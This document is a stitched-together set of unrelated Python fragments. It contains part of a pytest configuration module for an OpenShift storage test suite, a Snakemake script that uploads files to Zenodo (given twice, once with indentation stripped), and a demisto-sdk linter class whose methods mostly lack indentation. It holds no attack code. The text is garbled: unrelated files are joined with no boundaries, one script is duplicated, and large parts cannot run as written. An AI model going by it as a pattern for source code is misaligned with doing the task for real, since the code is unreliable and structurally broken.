    suffix = ocsci_config.cur_index + 1 if ocsci_config.multicluster else ""
    cluster_path = get_cli_param(config, f"cluster_path{suffix}")
    if not cluster_path:
        raise ClusterPathNotProvidedError()
    cluster_path = os.path.expanduser(cluster_path)
    if not os.path.exists(cluster_path):
        os.makedirs(cluster_path)
    # Importing here cause once the function is invoked we have already config
    # loaded, so this is OK to import once you sure that config is loaded.
    from ocs_ci.ocs.openshift_ops import OCP
    # Point both the OCP helper and RUN["kubeconfig"] at the kubeconfig file
    # inside the cluster directory.
    OCP.set_kubeconfig(
        os.path.join(cluster_path, ocsci_config.RUN["kubeconfig_location"])
    )
    ocsci_config.RUN.update(
        {
            "kubeconfig": os.path.join(
                cluster_path, ocsci_config.RUN["kubeconfig_location"]
            )
        }
    )
    cluster_name = get_cli_param(config, f"cluster_name{suffix}")
    ocsci_config.RUN["cli_params"]["teardown"] = get_cli_param(
        config, "teardown", default=False
    )
    ocsci_config.RUN["cli_params"]["deploy"] = get_cli_param(
        config, "deploy", default=False
    )
    # CLI flag wins; otherwise fall back to value already set in DEPLOYMENT.
    live_deployment = get_cli_param(
        config, "live_deploy", default=False
    ) or ocsci_config.DEPLOYMENT.get("live_deployment", False)
    ocsci_config.DEPLOYMENT["live_deployment"] = live_deployment
    if live_deployment:
        update_live_must_gather_image()
    io_in_bg = get_cli_param(config, "io_in_bg")
    if io_in_bg:
        ocsci_config.RUN["io_in_bg"] = True
    io_load = get_cli_param(config, "io_load")
    if io_load:
        ocsci_config.RUN["io_load"] = io_load
    log_utilization = get_cli_param(config, "log_cluster_utilization")
    if log_utilization:
        ocsci_config.RUN["log_utilization"] = True
    upgrade_ocs_version = get_cli_param(config, "upgrade_ocs_version")
    if upgrade_ocs_version:
        ocsci_config.UPGRADE["upgrade_ocs_version"] = upgrade_ocs_version
    ocs_registry_image = get_cli_param(config, f"ocs_registry_image{suffix}")
    if ocs_registry_image:
        ocsci_config.DEPLOYMENT["ocs_registry_image"] = ocs_registry_image
    upgrade_ocs_registry_image = get_cli_param(config, "upgrade_ocs_registry_image")
    if upgrade_ocs_registry_image:
        ocsci_config.UPGRADE["upgrade_ocs_registry_image"] = upgrade_ocs_registry_image
    ocsci_config.ENV_DATA["cluster_name"] = cluster_name
    ocsci_config.ENV_DATA["cluster_path"] = cluster_path
    get_cli_param(config, "collect-logs")
    # Cluster name is mandatory (and length-checked) only when deploying;
    # otherwise it may be derived from metadata in the cluster directory.
    if ocsci_config.RUN.get("cli_params").get("deploy"):
        if not cluster_name:
            raise ClusterNameNotProvidedError()
        if (
            len(cluster_name) < CLUSTER_NAME_MIN_CHARACTERS
            or len(cluster_name) > CLUSTER_NAME_MAX_CHARACTERS
        ):
            raise ClusterNameLengthError(cluster_name)
    elif not cluster_name:
        try:
            ocsci_config.ENV_DATA["cluster_name"] = get_cluster_name(cluster_path)
        except FileNotFoundError:
            raise ClusterNameNotProvidedError()
    if get_cli_param(config, "email") and not get_cli_param(config, "--html"):
        pytest.exit("--html option must be provided to send email reports")
    get_cli_param(config, "squad_analysis")
    get_cli_param(config, "-m")
    osd_size = get_cli_param(config, "--osd-size")
    if osd_size:
        ocsci_config.ENV_DATA["device_size"] = osd_size
    # Version options translate into extra config files layered on top of the
    # currently loaded configuration.
    ocp_version = get_cli_param(config, "--ocp-version")
    if ocp_version:
        version_config_file = f"ocp-{ocp_version}-config.yaml"
        version_config_file_path = os.path.join(
            OCP_VERSION_CONF_DIR, version_config_file
        )
        load_config_file(version_config_file_path)
    upgrade_ocp_version = get_cli_param(config, "--upgrade-ocp-version")
    if upgrade_ocp_version:
        version_config_file = f"ocp-{upgrade_ocp_version}-upgrade.yaml"
        version_config_file_path = os.path.join(
            OCP_VERSION_CONF_DIR, version_config_file
        )
        load_config_file(version_config_file_path)
    upgrade_ocp_image = get_cli_param(config, "--upgrade-ocp-image")
    if upgrade_ocp_image:
        # Image is "<source>:<tag>"; rsplit so the source may contain colons.
        ocp_image = upgrade_ocp_image.rsplit(":", 1)
        ocsci_config.UPGRADE["ocp_upgrade_path"] = ocp_image[0]
        ocsci_config.UPGRADE["ocp_upgrade_version"] = ocp_image[1]
    ocp_installer_version = get_cli_param(config, "--ocp-installer-version")
    if ocp_installer_version:
        ocsci_config.DEPLOYMENT["installer_version"] = ocp_installer_version
        ocsci_config.RUN["client_version"] = ocp_installer_version
    csv_change = get_cli_param(config, "--csv-change")
    if csv_change:
        # Expected format: "<from>::<to>"
        csv_change = csv_change.split("::")
        ocsci_config.DEPLOYMENT["csv_change_from"] = csv_change[0]
        ocsci_config.DEPLOYMENT["csv_change_to"] = csv_change[1]
    collect_logs_on_success_run = get_cli_param(config, "collect_logs_on_success_run")
    if collect_logs_on_success_run:
        ocsci_config.REPORTING["collect_logs_on_success_run"] = True
    get_cli_param(config, "dev_mode")
    ceph_debug = get_cli_param(config, "ceph_debug")
    if ceph_debug:
        ocsci_config.DEPLOYMENT["ceph_debug"] = True
    skip_download_client = get_cli_param(config, "skip_download_client")
    if skip_download_client:
        ocsci_config.DEPLOYMENT["skip_download_client"] = True
    re_trigger_failed_tests = get_cli_param(config, "--re-trigger-failed-tests")
    if re_trigger_failed_tests:
        ocsci_config.RUN["re_trigger_failed_tests"] = os.path.expanduser(
            re_trigger_failed_tests
        )
def pytest_collection_modifyitems(session, config, items):
    """
    Add Polarion ID property to test cases that are marked with one.

    When --re-trigger-failed-tests points at a junit XML report from a
    previous run, also drop every collected test that passed in that report,
    so only failed / skipped / errored cases run again.
    """
    re_trigger_failed_tests = ocsci_config.RUN.get("re_trigger_failed_tests")
    if re_trigger_failed_tests:
        junit_report = JUnitXml.fromfile(re_trigger_failed_tests)
        cases_to_re_trigger = []
        for suite in junit_report:
            # A truthy result element means the case did NOT pass cleanly.
            cases_to_re_trigger += [_case.name for _case in suite if _case.result]
    # Iterate over a copy so removing from the live list is safe.
    for item in items[:]:
        if re_trigger_failed_tests and item.name not in cases_to_re_trigger:
            log.info(
                f"Test case: {item.name} will be removed from execution, "
                "because of you provided --re-trigger-failed-tests parameter "
                "and this test passed in previous execution from the report!"
            )
            items.remove(item)
        # NOTE(review): removed items still get the polarion property below;
        # harmless, but a `continue` after removal would be cleaner.
        try:
            marker = item.get_closest_marker(name="polarion_id")
            if marker:
                polarion_id = marker.args[0]
                if polarion_id:
                    item.user_properties.append(("polarion-testcase-id", polarion_id))
        except IndexError:
            # Marker present but without a positional argument.
            log.warning(
                f"polarion_id marker found with no value for "
                f"{item.name} in {item.fspath}",
                exc_info=True,
            )
@pytest.hookimpl(tryfirst=True, hookwrapper=True)
def pytest_runtest_makereport(item, call):
    """
    Hook wrapper that inspects every test report and, on failure, collects
    OCS logs, Prometheus metrics and performance stats as configured.
    """
    # Let pytest build the report first, then post-process it.
    outcome = yield
    rep = outcome.get_result()
    # we only look at actual failing test calls, not setup/teardown
    if rep.failed and ocsci_config.RUN.get("cli_params").get("collect-logs"):
        test_case_name = item.name
        # Full OCP log collection only for the "call" phase failure.
        ocp_logs_collection = True if rep.when == "call" else False
        mcg = (
            True if any(x in item.location[0] for x in ["mcg", "ecosystem"]) else False
        )
        try:
            if not ocsci_config.RUN.get("is_ocp_deployment_failed"):
                collect_ocs_logs(
                    dir_name=test_case_name, ocp=ocp_logs_collection, mcg=mcg
                )
        except Exception:
            # Log collection is best effort; never fail the report hook.
            log.exception("Failed to collect OCS logs")
    # Collect Prometheus metrics if specified in gather_metrics_on_fail marker
    if (
        (rep.when == "setup" or rep.when == "call")
        and rep.failed
        and item.get_closest_marker("gather_metrics_on_fail")
    ):
        metrics = item.get_closest_marker("gather_metrics_on_fail").args
        try:
            collect_prometheus_metrics(
                metrics, f"{item.name}-{call.when}", call.start, call.stop
            )
        except Exception:
            log.exception("Failed to collect prometheus metrics")
    # Get the performance metrics when tests fails for scale or performance tag
    # Lazy import; presumably avoids import cost/cycle at module load — confirm.
    from ocs_ci.helpers.helpers import collect_performance_stats
    if (
        (rep.when == "setup" or rep.when == "call")
        and rep.failed
        and (item.get_closest_marker("scale") or item.get_closest_marker("performance"))
    ):
        test_case_name = item.name
        try:
            collect_performance_stats(test_case_name)
        except Exception:
            log.exception("Failed to collect performance stats")
def set_log_level(config):
    """
    Apply the ``log_cli_level`` ini option to this module's logger,
    defaulting to INFO when the option is unset or empty.

    Args:
        config (pytest.config): Pytest config object
    """
    ini_level = config.getini("log_cli_level")
    effective = ini_level if ini_level else "INFO"
    log.setLevel(logging.getLevelName(effective))
"""
This script is executed from within the ``upload`` rule
to upload files to Zenodo.
"""
import sys
from pathlib import Path
# Hack to import our custom functions
sys.path.insert(0, str(Path(__file__).parents[1]))
from helpers.exceptions import ShowyourworkException, ShowyourworkWarning
from helpers.zenodo import upload_simulation
# Go!
try:
upload_simulation(
snakemake.params["file_name"],
snakemake.params["deposit_id"],
snakemake.params["deposit_title"],
snakemake.params["deposit_description"],
snakemake.params["deposit_creators"],
zenodo_url=snakemake.params["zenodo_url"],
token_name=snakemake.params["token_name"],
file_path=snakemake.params["file_path"],
shell_cmd=snakemake.params["shell_cmd"],
repo_url=snakemake.params["repo_url"],
)
except ShowyourworkException as e:
if "The server could not verify that you are authorized" in e.message:
# Fail silently if the user doesn't have the
# right authentication to upload to the deposit
file_name = snakemake.params["file_name"]
file_path = snakemake.params["file_path"]
with open(f"{file_path}/{file_name}.zenodo", "w") as f:
print("UNAUTHORIZED", file=f)
# Raise a warning on job completion
ShowyourworkWarning(
e.message,
script=e.script,
rule_name=e.rule_name,
context="This error occurred because showyourwork tried to "
f"upload the file {file_name} to Zenodo under a deposit with id "
f"{snakemake.params["deposit_id"]}, but the current user does "
"not have the correct authentication. The API token for Zenodo "
f"should be stored in the environment variable {snakemake.params["token_name"]}, "
"but this token is either missing or invalid for editing the given "
"deposit id. If you are a third-party user (i.e., you cloned someone "
"else's repository and are attempting to build the paper locally), you "
"can either run ``make fast`` "
"to skip the dataset generation & upload step, "
"change the relevant `id` key in the config file to a specific *version* id "
"for the deposit, "
"or provide a concept id which you are authorized to edit; "
"to reserve an id under "
"your authentication, simply type `make reserve`. See the docs for more "
"details.",
brief=f"Unable to upload {file_name} to Zenodo.",
)
else:
        raise e
"""
This script is executed from within the ``upload`` rule
to upload files to Zenodo.
"""
import sys
from pathlib import Path

# Hack to import our custom functions
sys.path.insert(0, str(Path(__file__).parents[1]))
from helpers.exceptions import ShowyourworkException, ShowyourworkWarning
from helpers.zenodo import upload_simulation

# Go!
# All inputs come from the snakemake rule params; the upload itself is
# delegated to helpers.zenodo.upload_simulation.
try:
    upload_simulation(
        snakemake.params["file_name"],
        snakemake.params["deposit_id"],
        snakemake.params["deposit_title"],
        snakemake.params["deposit_description"],
        snakemake.params["deposit_creators"],
        zenodo_url=snakemake.params["zenodo_url"],
        token_name=snakemake.params["token_name"],
        file_path=snakemake.params["file_path"],
        shell_cmd=snakemake.params["shell_cmd"],
        repo_url=snakemake.params["repo_url"],
    )
except ShowyourworkException as e:
    if "The server could not verify that you are authorized" in e.message:
        # Fail silently if the user doesn't have the
        # right authentication to upload to the deposit
        file_name = snakemake.params["file_name"]
        file_path = snakemake.params["file_path"]
        # Marker file tells downstream rules the upload was skipped.
        with open(f"{file_path}/{file_name}.zenodo", "w") as f:
            print("UNAUTHORIZED", file=f)
        # Raise a warning on job completion
        ShowyourworkWarning(
            e.message,
            script=e.script,
            rule_name=e.rule_name,
            context="This error occurred because showyourwork tried to "
            f"upload the file {file_name} to Zenodo under a deposit with id "
            f"{snakemake.params['deposit_id']}, but the current user does "
            "not have the correct authentication. The API token for Zenodo "
            f"should be stored in the environment variable {snakemake.params['token_name']}, "
            "but this token is either missing or invalid for editing the given "
            "deposit id. If you are a third-party user (i.e., you cloned someone "
            "else's repository and are attempting to build the paper locally), you "
            "can either run ``make fast`` "
            "to skip the dataset generation & upload step, "
            "change the relevant `id` key in the config file to a specific *version* id "
            "for the deposit, "
            "or provide a concept id which you are authorized to edit; "
            "to reserve an id under "
            "your authentication, simply type `make reserve`. See the docs for more "
            "details.",
            brief=f"Unable to upload {file_name} to Zenodo.",
        )
    else:
        raise e
# STD python packages
import copy
import hashlib
import io
import json
import logging
import os
import platform
import time
import traceback
from copy import deepcopy
from typing import Any, Dict, List, Optional, Tuple
# 3-rd party packages
import docker
import docker.errors
import docker.models.containers
import requests.exceptions
import urllib3.exceptions
from demisto_sdk.commands.common.constants import (INTEGRATIONS_DIR,
PACKS_PACK_META_FILE_NAME,
TYPE_PWSH, TYPE_PYTHON)
# Local packages
from demisto_sdk.commands.common.tools import (get_all_docker_images,
run_command_os)
from demisto_sdk.commands.lint.commands_builder import (
build_bandit_command, build_flake8_command, build_mypy_command,
build_pwsh_analyze_command, build_pwsh_test_command, build_pylint_command,
build_pytest_command, build_vulture_command, build_xsoar_linter_command)
from demisto_sdk.commands.lint.helpers import (EXIT_CODES, FAIL, RERUN, RL,
SUCCESS, WARNING,
add_tmp_lint_files,
add_typing_module,
get_file_from_container,
get_python_version_from_image,
pylint_plugin,
split_warnings_errors,
stream_docker_container_output)
from jinja2 import Environment, FileSystemLoader, exceptions
from ruamel.yaml import YAML
from wcmatch.pathlib import NEGATE, Path
logger = logging.getLogger('demisto-sdk')
class Linter:
""" Linter used to activate lint command on single package
Attributes:
pack_dir(Path): Pack to run lint on.
content_repo(Path): Git repo object of content repo.
req_2(list): requirements for docker using python2.
req_3(list): requirements for docker using python3.
docker_engine(bool): Whether docker engine detected by docker-sdk.
"""
def __init__(self, pack_dir: Path, content_repo: Path, req_3: list, req_2: list, docker_engine: bool):
self._req_3 = req_3
self._req_2 = req_2
self._content_repo = content_repo
self._pack_abs_dir = pack_dir
self._pack_name = None
# Docker client init
if docker_engine:
self._docker_client: docker.DockerClient = docker.from_env()
self._docker_hub_login = self._docker_login()
# Facts gathered regarding pack lint and test
self._facts: Dict[str, Any] = {
"images": [],
"python_version": 0,
"env_vars": {},
"test": False,
"lint_files": [],
"support_level": None,
"is_long_running": False,
"lint_unittest_files": [],
"additional_requirements": [],
"docker_engine": docker_engine,
"is_script": False,
"commands": None
}
# Pack lint status object - visualize it
self._pkg_lint_status: Dict = {
"pkg": None,
"pack_type": None,
"path": str(self._content_repo),
"errors": [],
"images": [],
"flake8_errors": None,
"XSOAR_linter_errors": None,
"bandit_errors": None,
"mypy_errors": None,
"vulture_errors": None,
"flake8_warnings": None,
"XSOAR_linter_warnings": None,
"bandit_warnings": None,
"mypy_warnings": None,
"vulture_warnings": None,
"exit_code": SUCCESS,
"warning_code": SUCCESS,
}
    def run_dev_packages(self, no_flake8: bool, no_bandit: bool, no_mypy: bool, no_pylint: bool, no_vulture: bool,
                         no_xsoar_linter: bool, no_pwsh_analyze: bool, no_pwsh_test: bool, no_test: bool, modules: dict,
                         keep_container: bool, test_xml: str) -> dict:
        """ Run lint and tests on a single package.

        Performs the following:
        1. Lint checks on the host - flake8, XSOAR linter, bandit, mypy, vulture (python packs only).
        2. Lint and tests inside the pack's docker image - pylint/pytest or powershell analyze/test
           (only when a docker engine was detected).

        Args:
            no_flake8(bool): Whether to skip flake8
            no_bandit(bool): Whether to skip bandit
            no_mypy(bool): Whether to skip mypy
            no_pylint(bool): Whether to skip pylint
            no_vulture(bool): Whether to skip vulture
            no_xsoar_linter(bool): Whether to skip the XSOAR linter
            no_pwsh_analyze(bool): Whether to skip powershell code analyzing
            no_pwsh_test(bool): Whether to skip powershell tests
            no_test(bool): Whether to skip pytest
            modules(dict): Mandatory modules to locate in pack path (CommonServerPython.py etc)
            keep_container(bool): Whether to keep the test container
            test_xml(str): Path for saving pytest xml results

        Returns:
            dict: the package's aggregated lint/test status (self._pkg_lint_status)
        """
        # Gather facts (python version, images, files to lint); True means "skip this pack"
        skip = self._gather_facts(modules)
        # If not a python/powershell pack - nothing to lint
        if skip:
            return self._pkg_lint_status
        try:
            # Locate mandatory files in pack path - for more info checkout the context manager LintFiles
            with add_tmp_lint_files(content_repo=self._content_repo,  # type: ignore
                                    pack_path=self._pack_abs_dir,
                                    lint_files=self._facts["lint_files"],
                                    modules=modules,
                                    pack_type=self._pkg_lint_status["pack_type"]):
                # Run lint check on host - flake8, bandit, mypy (python packs only)
                if self._pkg_lint_status["pack_type"] == TYPE_PYTHON:
                    self._run_lint_in_host(no_flake8=no_flake8,
                                           no_bandit=no_bandit,
                                           no_mypy=no_mypy,
                                           no_vulture=no_vulture,
                                           no_xsoar_linter=no_xsoar_linter)
                # Run lint and test check on pack docker image
                if self._facts["docker_engine"]:
                    self._run_lint_on_docker_image(no_pylint=no_pylint,
                                                   no_test=no_test,
                                                   no_pwsh_analyze=no_pwsh_analyze,
                                                   no_pwsh_test=no_pwsh_test,
                                                   keep_container=keep_container,
                                                   test_xml=test_xml)
        except Exception as ex:
            # Any unexpected failure is recorded on the pack status instead of killing the worker thread
            err = f'{self._pack_abs_dir}: Unexpected fatal exception: {str(ex)}'
            logger.error(f"{err}. Traceback: {traceback.format_exc()}")
            self._pkg_lint_status["errors"].append(err)
            self._pkg_lint_status['exit_code'] += FAIL
        return self._pkg_lint_status
def _gather_facts(self, modules: dict) -> bool:
""" Gathering facts about the package - python version, docker images, valid docker image, yml parsing
Args:
modules(dict): Test mandatory modules to be ignore in lint check
Returns:
bool: Indicating if to continue further or not, if False exit Thread, Else continue.
"""
# Looking for pkg yaml
yml_file: Optional[Path] = self._pack_abs_dir.glob([r'*.yaml', r'*.yml', r'!*unified*.yml'], flags=NEGATE)
if not yml_file:
logger.info(f"{self._pack_abs_dir} - Skipping no yaml file found {yml_file}")
self._pkg_lint_status["errors"].append('Unable to find yml file in package')
return True
else:
try:
yml_file = next(yml_file)
except StopIteration:
return True
# Get pack name
self._pack_name = yml_file.stem
log_prompt = f"{self._pack_name} - Facts"
self._pkg_lint_status["pkg"] = yml_file.stem
logger.info(f"{log_prompt} - Using yaml file {yml_file}")
# Parsing pack yaml - in order to verify if check needed
try:
script_obj: Dict = {}
yml_obj: Dict = YAML().load(yml_file)
if isinstance(yml_obj, dict):
script_obj = yml_obj.get('script', {}) if isinstance(yml_obj.get('script'), dict) else yml_obj
self._facts['is_script'] = True if 'Scripts' in yml_file.parts else False
self._facts['is_long_running'] = script_obj.get('longRunning')
self._facts['commands'] = self._get_commands_list(script_obj)
self._pkg_lint_status["pack_type"] = script_obj.get('type')
except (FileNotFoundError, IOError, KeyError):
self._pkg_lint_status["errors"].append('Unable to parse package yml')
return True
# return no check needed if not python pack
if self._pkg_lint_status["pack_type"] not in (TYPE_PYTHON, TYPE_PWSH):
logger.info(f"{log_prompt} - Skipping due to not Python, Powershell package - Pack is"
f" {self._pkg_lint_status["pack_type"]}")
return True
# Docker images
if self._facts["docker_engine"]:
logger.info(f"{log_prompt} - Pulling docker images, can take up to 1-2 minutes if not exists locally ")
self._facts["images"] = [[image, -1] for image in get_all_docker_images(script_obj=script_obj)]
# Gather environment variables for docker execution
self._facts["env_vars"] = {
"CI": os.getenv("CI", False),
"DEMISTO_LINT_UPDATE_CERTS": os.getenv('DEMISTO_LINT_UPDATE_CERTS', "yes")
}
lint_files = set()
# Facts for python pack
if self._pkg_lint_status["pack_type"] == TYPE_PYTHON:
self._update_support_level()
if self._facts["docker_engine"]:
# Getting python version from docker image - verifying if not valid docker image configured
for image in self._facts["images"]:
py_num: float = get_python_version_from_image(image=image[0])
image[1] = py_num
logger.info(f"{self._pack_name} - Facts - {image[0]} - Python {py_num}")
if not self._facts["python_version"]:
self._facts["python_version"] = py_num
# Checking whatever *test* exists in package
self._facts["test"] = True if next(self._pack_abs_dir.glob([r'test_*.py', r'*_test.py']),
None) else False
if self._facts["test"]:
logger.info(f"{log_prompt} - Tests found")
else:
logger.info(f"{log_prompt} - Tests not found")
# Gather package requirements embedded test-requirements.py file
test_requirements = self._pack_abs_dir / 'test-requirements.txt'
if test_requirements.exists():
try:
additional_req = test_requirements.read_text(encoding='utf-8').strip().split('\n')
self._facts["additional_requirements"].extend(additional_req)
logger.info(f"{log_prompt} - Additional package Pypi packages found - {additional_req}")
except (FileNotFoundError, IOError):
self._pkg_lint_status["errors"].append('Unable to parse test-requirements.txt in package')
elif not self._facts["python_version"]:
# get python version from yml
pynum = 3.7 if (script_obj.get('subtype', 'python3') == 'python3') else 2.7
self._facts["python_version"] = pynum
logger.info(f"{log_prompt} - Using python version from yml: {pynum}")
# Get lint files
lint_files = set(self._pack_abs_dir.glob(["*.py", "!__init__.py", "!*.tmp"],
flags=NEGATE))
# Facts for Powershell pack
elif self._pkg_lint_status["pack_type"] == TYPE_PWSH:
# Get lint files
lint_files = set(
self._pack_abs_dir.glob(["*.ps1", "!*Tests.ps1", "CommonServerPowerShell.ps1", "demistomock.ps1'"],
flags=NEGATE))
# Add CommonServer to the lint checks
if 'commonserver' in self._pack_abs_dir.name.lower():
# Powershell
if self._pkg_lint_status["pack_type"] == TYPE_PWSH:
self._facts["lint_files"] = [Path(self._pack_abs_dir / 'CommonServerPowerShell.ps1')]
# Python
elif self._pkg_lint_status["pack_type"] == TYPE_PYTHON:
self._facts["lint_files"] = [Path(self._pack_abs_dir / 'CommonServerPython.py')]
else:
test_modules = {self._pack_abs_dir / module.name for module in modules.keys()}
lint_files = lint_files.difference(test_modules)
self._facts["lint_files"] = list(lint_files)
if self._facts["lint_files"]:
for lint_file in self._facts["lint_files"]:
logger.info(f"{log_prompt} - Lint file {lint_file}")
else:
logger.info(f"{log_prompt} - Lint files not found")
self._split_lint_files()
return False
def _split_lint_files(self):
""" Remove unit test files from _facts['lint_files'] and put into their own list _facts['lint_unittest_files']
This is because not all lints should be done on unittest files.
"""
lint_files_list = deepcopy(self._facts["lint_files"])
for lint_file in lint_files_list:
if lint_file.name.startswith('test_') or lint_file.name.endswith('_test.py'):
self._facts['lint_unittest_files'].append(lint_file)
self._facts["lint_files"].remove(lint_file)
    def _run_lint_in_host(self, no_flake8: bool, no_bandit: bool, no_mypy: bool, no_vulture: bool,
                          no_xsoar_linter: bool):
        """ Run lint checks on the host (no docker) - flake8, XSOAR linter, bandit, mypy, vulture.

        Results are accumulated into self._pkg_lint_status: per-check error/warning strings plus
        bitwise exit_code / warning_code flags (EXIT_CODES bit per check).

        Args:
            no_flake8(bool): Whether to skip flake8.
            no_bandit(bool): Whether to skip bandit.
            no_mypy(bool): Whether to skip mypy.
            no_vulture(bool): Whether to skip vulture.
            no_xsoar_linter(bool): Whether to skip the XSOAR linter.
        """
        warning = []
        error = []
        other = []
        exit_code: int = 0
        for lint_check in ["flake8", "XSOAR_linter", "bandit", "mypy", "vulture"]:
            exit_code = SUCCESS
            output = ""
            # flake8 also covers unit-test files, so it runs when either list is non-empty
            if self._facts["lint_files"] or self._facts["lint_unittest_files"]:
                if lint_check == "flake8" and not no_flake8:
                    flake8_lint_files = copy.deepcopy(self._facts["lint_files"])
                    # if there are unittest files then flake8 runs on them too.
                    if self._facts['lint_unittest_files']:
                        flake8_lint_files.extend(self._facts['lint_unittest_files'])
                    exit_code, output = self._run_flake8(py_num=self._facts["python_version"], lint_files=flake8_lint_files)
            # all other checks run on production code files only
            if self._facts["lint_files"]:
                if lint_check == "XSOAR_linter" and not no_xsoar_linter:
                    exit_code, output = self._run_xsoar_linter(py_num=self._facts["python_version"],
                                                               lint_files=self._facts["lint_files"])
                elif lint_check == "bandit" and not no_bandit:
                    exit_code, output = self._run_bandit(lint_files=self._facts["lint_files"])
                elif lint_check == "mypy" and not no_mypy:
                    exit_code, output = self._run_mypy(py_num=self._facts["python_version"],
                                                       lint_files=self._facts["lint_files"])
                elif lint_check == "vulture" and not no_vulture:
                    exit_code, output = self._run_vulture(py_num=self._facts["python_version"],
                                                          lint_files=self._facts["lint_files"])
            # check for any exit code other than 0
            if exit_code:
                error, warning, other = split_warnings_errors(output)
            if exit_code and warning:
                self._pkg_lint_status["warning_code"] |= EXIT_CODES[lint_check]
                self._pkg_lint_status[f"{lint_check}_warnings"] = "\n".join(warning)
            if exit_code & FAIL:
                self._pkg_lint_status["exit_code"] |= EXIT_CODES[lint_check]
                # if the errors were extracted correctly (they start with E)
                if error:
                    self._pkg_lint_status[f"{lint_check}_errors"] = "\n".join(error)
                # if there were errors but they do not start with E
                else:
                    self._pkg_lint_status[f"{lint_check}_errors"] = "\n".join(other)
def _run_flake8(self, py_num: float, lint_files: List[Path]) -> Tuple[int, str]:
""" Runs flake8 in pack dir
Args:
py_num(float): The python version in use
lint_files(List[Path]): file to perform lint
Returns:
int: 0 on successful else 1, errors
str: Bandit errors
"""
log_prompt = f"{self._pack_name} - Flake8"
logger.info(f"{log_prompt} - Start")
stdout, stderr, exit_code = run_command_os(command=build_flake8_command(lint_files, py_num),
cwd=self._content_repo)
logger.debug(f"{log_prompt} - Finished exit-code: {exit_code}")
logger.debug(f"{log_prompt} - Finished stdout: {RL if stdout else ""}{stdout}")
logger.debug(f"{log_prompt} - Finished stderr: {RL if stderr else ""}{stderr}")
if stderr or exit_code:
logger.info(f"{log_prompt}- Finished errors found")
if stderr:
return FAIL, stderr
else:
return FAIL, stdout
logger.info(f"{log_prompt} - Successfully finished")
return SUCCESS, ""
def _run_xsoar_linter(self, py_num: float, lint_files: List[Path]) -> Tuple[int, str]:
""" Runs Xsaor linter in pack dir
Args:
lint_files(List[Path]): file to perform lint
Returns:
int: 0 on successful else 1, errors
str: Xsoar linter errors
"""
status = SUCCESS
FAIL_PYLINT = 0b10
with pylint_plugin(self._pack_abs_dir):
log_prompt = f"{self._pack_name} - XSOAR Linter"
logger.info(f"{log_prompt} - Start")
myenv = os.environ.copy()
if myenv.get('PYTHONPATH'):
myenv['PYTHONPATH'] += ':' + str(self._pack_abs_dir)
else:
myenv['PYTHONPATH'] = str(self._pack_abs_dir)
if self._facts['is_long_running']:
myenv['LONGRUNNING'] = 'True'
if py_num < 3:
myenv['PY2'] = 'True'
myenv['is_script'] = str(self._facts['is_script'])
# as Xsoar checker is a pylint plugin and runs as part of pylint code, we can not pass args to it.
# as a result we can use the env vars as a getway.
myenv['commands'] = ','.join([str(elem) for elem in self._facts['commands']]) \
if self._facts['commands'] else ''
stdout, stderr, exit_code = run_command_os(
command=build_xsoar_linter_command(lint_files, py_num, self._facts.get('support_level', 'base')),
cwd=self._pack_abs_dir, env=myenv)
if exit_code & FAIL_PYLINT:
logger.info(f"{log_prompt}- Finished errors found")
status = FAIL
if exit_code & WARNING:
logger.info(f"{log_prompt} - Finished warnings found")
if not status:
status = WARNING
# if pylint did not run and failure exit code has been returned from run commnad
elif exit_code & FAIL:
status = FAIL
# for contrib prs which are not merged from master and do not have pylint in dev-requirements-py2.
if os.environ.get('CI'):
stdout = "Xsoar linter could not run, Please merge from master"
else:
stdout = "Xsoar linter could not run, please make sure you have" \
" the necessary Pylint version for both py2 and py3"
logger.info(f"{log_prompt}- Finished errors found")
logger.debug(f"{log_prompt} - Finished exit-code: {exit_code}")
logger.debug(f"{log_prompt} - Finished stdout: {RL if stdout else ""}{stdout}")
logger.debug(f"{log_prompt} - Finished stderr: {RL if stderr else ""}{stderr}")
if not exit_code:
logger.info(f"{log_prompt} - Successfully finished")
return status, stdout
def _run_bandit(self, lint_files: List[Path]) -> Tuple[int, str]:
""" Run bandit in pack dir
Args:
lint_files(List[Path]): file to perform lint
Returns:
int: 0 on successful else 1, errors
str: Bandit errors
"""
log_prompt = f"{self._pack_name} - Bandit"
logger.info(f"{log_prompt} - Start")
stdout, stderr, exit_code = run_command_os(command=build_bandit_command(lint_files),
cwd=self._pack_abs_dir)
logger.debug(f"{log_prompt} - Finished exit-code: {exit_code}")
logger.debug(f"{log_prompt} - Finished stdout: {RL if stdout else ""}{stdout}")
logger.debug(f"{log_prompt} - Finished stderr: {RL if stderr else ""}{stderr}")
if stderr or exit_code:
logger.info(f"{log_prompt}- Finished Finished errors found")
if stderr:
return FAIL, stderr
else:
return FAIL, stdout
logger.info(f"{log_prompt} - Successfully finished")
return SUCCESS, ""
def _run_mypy(self, py_num: float, lint_files: List[Path]) -> Tuple[int, str]:
""" Run mypy in pack dir
Args:
py_num(float): The python version in use
lint_files(List[Path]): file to perform lint
Returns:
int: 0 on successful else 1, errors
str: Bandit errors
"""
log_prompt = f"{self._pack_name} - Mypy"
logger.info(f"{log_prompt} - Start")
with add_typing_module(lint_files=lint_files, python_version=py_num):
stdout, stderr, exit_code = run_command_os(command=build_mypy_command(files=lint_files, version=py_num),
cwd=self._pack_abs_dir)
logger.debug(f"{log_prompt} - Finished exit-code: {exit_code}")
logger.debug(f"{log_prompt} - Finished stdout: {RL if stdout else ""}{stdout}")
logger.debug(f"{log_prompt} - Finished stderr: {RL if stderr else ""}{stderr}")
if stderr or exit_code:
logger.info(f"{log_prompt}- Finished Finished errors found")
if stderr:
return FAIL, stderr
else:
return FAIL, stdout
logger.info(f"{log_prompt} - Successfully finished")
return SUCCESS, ""
def _run_vulture(self, py_num: float, lint_files: List[Path]) -> Tuple[int, str]:
""" Run mypy in pack dir
Args:
py_num(float): The python version in use
lint_files(List[Path]): file to perform lint
Returns:
int: 0 on successful else 1, errors
str: Vulture errors
"""
log_prompt = f"{self._pack_name} - Vulture"
logger.info(f"{log_prompt} - Start")
stdout, stderr, exit_code = run_command_os(command=build_vulture_command(files=lint_files,
pack_path=self._pack_abs_dir,
py_num=py_num),
cwd=self._pack_abs_dir)
logger.debug(f"{log_prompt} - Finished exit-code: {exit_code}")
logger.debug(f"{log_prompt} - Finished stdout: {RL if stdout else ""}{stdout}")
logger.debug(f"{log_prompt} - Finished stderr: {RL if stderr else ""}{stderr}")
if stderr or exit_code:
logger.info(f"{log_prompt}- Finished Finished errors found")
if stderr:
return FAIL, stderr
else:
return FAIL, stdout
logger.info(f"{log_prompt} - Successfully finished")
return SUCCESS, ""
